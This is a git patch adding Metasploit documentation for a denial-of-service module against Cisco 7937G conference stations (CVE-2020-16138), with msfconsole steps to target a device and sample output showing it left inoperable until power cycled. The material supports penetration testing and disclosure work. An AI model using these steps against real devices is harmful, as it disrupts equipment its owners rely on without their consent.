From b461f4ede89cd4259df3338aba3b5bd7e4112ef4 Mon Sep 17 00:00:00 2001
From: debifrank
Date: Thu, 13 Aug 2020 09:56:30 -0400
Subject: [PATCH] Add files via upload

Linted with msftidy_docs.rb
---
 .../auxiliary/dos/cisco/CVE-2020-16138.md | 47 +++++++++++++++++++
 1 file changed, 47 insertions(+)
 create mode 100644 documentation/modules/auxiliary/dos/cisco/CVE-2020-16138.md

diff --git a/documentation/modules/auxiliary/dos/cisco/CVE-2020-16138.md b/documentation/modules/auxiliary/dos/cisco/CVE-2020-16138.md
new file mode 100644
index 0000000000..a6452fd4b2
--- /dev/null
+++ b/documentation/modules/auxiliary/dos/cisco/CVE-2020-16138.md
@@ -0,0 +1,47 @@
+## Vulnerable Application
+
+ 1. Obtain a Cisco 7937G Conference Station.
+ 2. Enable SSH Access on the device.
+ 3. It has been observed that based on the firmware available from Cisco, all version are likely vulnerable.
+
+## Verification Steps
+
+ 1. Start msfconsole
+ 2. Do: `use auxiliary/dos/cisco/CVE-2020-16138`
+ 3. Do: `set RHOST 192.168.1.10`
+ 4. Do: `run`
+ 5. The conference station should now be inoperable until it is power cycled
+
+## Options
+
+ 1. rhost (required) - Target addres
+ 2. timeout (not required) - Timeout in seconds to wait before aborting
+
+## Scenarios
+
+#### Successful Scenario:
+```
+[*] Starting server...
+[*] 192.168.110.209 - Connected (version 2.0, client OpenSSH_4.3)
+[-] 192.168.110.209 - Exception: Incompatible ssh peer (no acceptable kex algorithm)
+[-] 192.168.110.209 - Traceback (most recent call last):
+[-] 192.168.110.209 - File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2083, in run
+[-] 192.168.110.209 - self._handler_table[ptype](self, m)
+[-] 192.168.110.209 - File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2198, in _negotiate_keys
+[-] 192.168.110.209 - self._parse_kex_init(m)
+[-] 192.168.110.209 - File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2354, in _parse_kex_init
+[-] 192.168.110.209 - raise SSHException(
+[-] 192.168.110.209 - paramiko.ssh_exception.SSHException: Incompatible ssh peer (no acceptable kex algorithm)
+[-] 192.168.110.209 -
+[*] 192.168.110.209 - DoS non-reset attack completed!
+[*] 192.168.110.209 - Errors are intended.
+[*] 192.168.110.209 - Device must be power cycled to restore functionality.
+[*] Auxiliary module execution completed
+```
+
+#### Unsuccessful Scenario:
+```
+[*] Starting server...
+[-] 192.168.110.209 - Device doesn't appear to be functioning (already DoS'd?) or SSH is not enabled.
+[*] Auxiliary module execution completed
+```